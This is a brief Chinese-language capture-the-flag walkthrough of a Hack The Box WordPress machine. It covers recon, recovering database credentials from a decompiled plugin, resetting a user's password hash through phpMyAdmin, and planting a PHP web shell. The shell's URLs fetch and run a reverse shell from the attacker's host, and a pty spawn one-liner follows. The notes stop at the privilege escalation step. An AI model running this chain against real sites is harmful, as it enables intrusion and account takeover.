Recon

  • RustscanNmap- 觀察首頁-
  • 看起來是 Wordpress掃目錄- https://www.exploit-db.com/exploits/46676
  • phpmyadmin
  • pluginsPHPmyadmin-
  • Version 4.5.4.1
  • 有 Exploithttps://www.exploit-db.com/exploits/40185要帳密繼續觀察-
  • 他有一個 Wiki
  • 其實剛剛 dirsearch 就有看到

Wordpress

  • 觀察 Wordpress 使用者http://10.129.1.53/index.php/?author=1
  • notch
  • 嘗試登入 /wp-admin- 觀察目錄 /plugins- plugins
  • 裡面有兩個檔案
  • 感覺 BlockyCore.jar 是它們自己寫的

Reverse

  • 用 r2 觀察算ㄌ還是不要裝逼,乖乖用 jd-gui 笑死- 找到 db 帳密- root
  • 8YsqfCTnvxAUeduzjNSXe22

PHP My admin

  • 用帳密登入後找到 Wordpress 使用者頁面
  • 備份原本使用者的 hash 以備不時之需
  • $P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/把 hash 修改成 12345 的 md5- 827ccb0eea8a706c4c34a16891f84e7b

登入 Wordpress

  • 用帳號 notch 密碼 12345 登入在 plugin 中增加 php web shell- 確認 webshell 可用- 下載 reverse shell- http://10.129.1.53/wp-content/plugins/akismet/akismet.php?A=wget%2010.10.16.35:8000/s_HTB執行 webshell- http://10.129.1.53/wp-content/plugins/akismet/akismet.php?A=bash%20s_HTB

Reverse shell

  • spawn shellpython3 -c 'import pty; pty.spawn("/bin/bash")'

提權